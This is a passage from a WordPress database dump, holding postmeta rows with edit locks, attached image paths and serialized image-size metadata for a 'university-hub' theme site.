\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25582, 10380, '_thumbnail_id', '10381'),
(25585, 10380, '_hide_featured', NULL),
(25590, 10384, '_edit_lock', '1597289874:14'),
(25591, 10384, '_edit_last', '14'),
(25592, 10385, '_wp_attached_file', '2020/08/13086321.jpg'),
(25593, 10385, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086321.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086321-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086321-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086321-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086321-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086321-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25594, 10384, '_thumbnail_id', '10385'),
(25597, 10384, '_hide_featured', NULL),
(25600, 10387, '_edit_lock', '1597289969:14'),
(25601, 10387, '_edit_last', '14'),
(25602, 10388, '_wp_attached_file', '2020/08/13086322.jpg'),
(25603, 10388, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086322.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086322-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086322-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086322-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25604, 10387, '_thumbnail_id', '10388'),
(25607, 10387, '_hide_featured', NULL),
(25608, 10387, '_oembed_9a74d2b656b7a1a6be195f461d649142', '{{unknown}}'),
(25613, 10391, '_edit_lock', '1597290188:14'),
(25614, 10391, '_edit_last', '14'),
(25615, 10392, '_wp_attached_file', '2020/08/13086323.jpg'),
(25616, 10392, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086323.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086323-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086323-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086323-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25617, 10391, '_thumbnail_id', '10392'),
(25620, 10391, '_hide_featured', NULL),
(25623, 10394, '_edit_lock', '1597290164:14'),
(25624, 10394, '_edit_last', '14'),
(25625, 10395, '_wp_attached_file', '2020/08/13086324.jpg'),
(25626, 10395, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:20:\"2020/08/13086324.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086324-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086324-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086324-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086324-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086324-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25627, 10396, '_wp_attached_file', '2020/08/13086324-1.jpg'),
(25628, 10396, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2020/08/13086324-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"13086324-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"13086324-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"13086324-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"13086324-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"13086324-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25629, 10394, '_thumbnail_id', '10396'),
(25632, 10394, '_hide_featured', NULL),
(25635, 10398, '_edit_lock', '1597290285:14'),
(25636, 10398, '_edit_last', '14'),
(25637, 10399, '_wp_attached_file', '2020/08/13086325.jpg'),
(25638, 10399, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086325.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086325-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086325-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086325-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086325-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086325-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25639, 10398, '_thumbnail_id', '10399'),
(25642, 10398, '_hide_featured', NULL),
(25645, 10401, '_edit_lock', '1597290465:14'),
(25646, 10401, '_edit_last', '14'),
(25647, 10402, '_wp_attached_file', '2020/08/13086326.jpg'),
(25648, 10402, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086326.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086326-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086326-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086326-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086326-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086326-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25649, 10401, '_thumbnail_id', '10402'),
(25652, 10401, '_hide_featured', NULL),
(25655, 10404, '_edit_lock', '1597290572:14'),
(25656, 10404, '_edit_last', '14'),
(25657, 10405, '_wp_attached_file', '2020/08/13086327.jpg'),
(25658, 10405, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086327.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086327-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086327-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086327-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086327-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086327-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25659, 10404, '_thumbnail_id', '10405'),
(25662, 10404, '_hide_featured', NULL),
(25665, 10407, '_edit_lock', '1597290880:14'),
(25666, 10407, '_edit_last', '14'),
(25667, 10408, '_wp_attached_file', '2020/08/13086328.jpg'),
(25668, 10408, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086328.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086328-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086328-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086328-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086328-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086328-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25669, 10407, '_thumbnail_id', '10408'),
(25672, 10407, '_hide_featured', NULL),
(25675, 10410, '_edit_lock', '1597290863:14'),
(25676, 10410, '_edit_last', '14'),
(25677, 10411, '_wp_attached_file', '2020/08/13086329.jpg'),
(25678, 10411, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086329.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086329-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086329-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086329-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086329-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086329-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25679, 10410, '_thumbnail_id', '10411'),
(25682, 10410, '_hide_featured', NULL),
(25685, 10413, '_edit_lock', '1597291000:14'),
(25686, 10413, '_edit_last', '14'),
(25687, 10414, '_wp_attached_file', '2020/08/13086330.jpg'),
(25688, 10414, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086330.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086330-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086330-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086330-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25689, 10413, '_thumbnail_id', '10414'),
(25692, 10413, '_hide_featured', NULL),
(25695, 10416, '_edit_lock', '1597291105:14'),
(25696, 10416, '_edit_last', '14'),
(25697, 10417, '_wp_attached_file', '2020/08/13086331.jpg'),
(25698, 10417, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086331.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086331-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086331-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086331-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086331-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086331-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25699, 10416, '_thumbnail_id', '10417'),
(25702, 10416, '_hide_featured', NULL),
(25705, 10419, '_edit_lock', '1597291398:14'),
(25706, 10419, '_edit_last', '14'),
(25707, 10420, '_wp_attached_file', '2020/08/13086332.jpg'),
(25708, 10420, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086332.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086332-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086332-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086332-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086332-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086332-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25709, 10419, '_thumbnail_id', '10420'),
(25712, 10419, '_hide_featured', NULL),
(25715, 10422, '_edit_lock', '1597291391:14'),
(25716, 10422, '_edit_last', '14'),
(25717, 10423, '_wp_attached_file', '2020/08/13086333.jpg'),
(25718, 10423, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086333.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086333-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086333-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086333-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086333-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086333-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25719, 10422, '_thumbnail_id', '10423'),
(25722, 10422, '_hide_featured', NULL),
(25725, 10425, '_edit_lock', '1597291571:14'),
(25726, 10425, '_edit_last', '14'),
(25727, 10426, '_wp_attached_file', '2020/08/13086334.jpg'),
(25728, 10426, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086334.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086334-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086334-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086334-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086334-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086334-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25729, 10425, '_thumbnail_id', '10426'),
(25732, 10425, '_hide_featured', NULL),
(25735, 10428, '_edit_lock', '1597291721:14'),
(25736, 10428, '_edit_last', '14'),
(25737, 10429, '_wp_attached_file', '2020/08/13086335.jpg'),
(25738, 10429, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086335.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086335-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086335-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086335-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086335-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086335-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shu